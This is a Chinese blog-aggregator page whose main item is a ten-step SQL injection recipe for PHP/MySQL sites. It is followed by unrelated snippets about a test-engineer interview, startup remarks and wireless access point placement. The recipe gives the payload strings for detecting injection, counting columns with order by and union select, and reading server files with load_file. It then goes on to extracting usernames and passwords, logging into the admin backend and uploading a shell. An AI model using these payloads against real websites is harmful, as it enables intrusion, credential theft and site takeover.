php注入十點基本步驟

2021-04-14 15:49:36 字數 793 閱讀 3583

php注入十點基本步驟

1.判斷是否存在注入,加';and 1=1;and 1=2

2.判斷版本 and ord(mid(version(),1,1))>51 /* 返回正常說明是4.0以上版本,可以用union查詢

3.利用order by 暴欄位,在**後加 order by 10 /* 如果返回正常說明字段大於10

4.再利用union來查詢準確字段,如: and 1=2 union select 1,2,3,......./*直到返回正常,說明猜到準確字段數。如過濾了空格可以用/**/代替。

5.判斷資料庫連線帳號有沒有寫許可權,and (select count(*) from mysql.user)>0 /*如果結果返回錯誤,那我們只能猜解管理員帳號和密碼了。

6. 如果返回正常,則可以通過and 1=2 union select 1,2,3,4,5,6,load_file(char(檔案路徑的ascii值,用逗號隔開)),8,9,10 /* 注:load_file(char(檔案路徑的ascii值,用逗號隔開))也可以用十六進製制,通過這種方式讀取配置檔案,找到資料庫連線等。

7.首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6.... from user /* 如果返回正常,說明存在這個表。

8.知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6.... from user/*如果在2欄位顯示出欄位內容則存在些字段。

9.同理再猜解password欄位,猜解成功再找後台登入。

10.登入後台,上傳shell。

20200907上午十點半面經

1.自我介紹 2.主要做哪些測試 是否功能測試居多 3.測試用例如何詳細編寫 比如註冊 登入 3.拿到需求之後,怎樣的乙個測試流程 4.最近做的乙個專案,主要負責了哪個部分,有哪些功能 5.fiddler主要用來幹什麼 f12就能做到,為啥用fiddler 6.介面測試會自己編寫指令碼麼 7.通過抓...

隨手小記 創業瞎聊十點

鄭昀 銳推榜 20090805 1 業界誰出了事兒,誰被關了,你不要事後諸葛亮,有本事事前 並且把話說到明面兒上。2 別人鬱悶不鬱悶,跟你沒關係,把你的夢想做好做強,不要去操別人的心。王興們如何,還沒有定論,胖女人還沒出場唱歌呢。3 多給別人捧場,別沒事兒淨幹砸場子的事兒。4 別把自己正在做的事情當...

無線接入點部署十點建議

近年來,無線裝置製造商始終致力於讓無線接入點裝置的部署趨於簡單化,這將使總體的部署工程變得十分簡便。但對於使用者來說,在實際部署當中仍然需要注意幾項規範。本文所介紹的,就是在實際部署無線接入點時應該遵循的幾項基本原則。1.接入點的部署位置不應位於金屬結構附近 在部署無線接入點時,使用者需要注意到部署...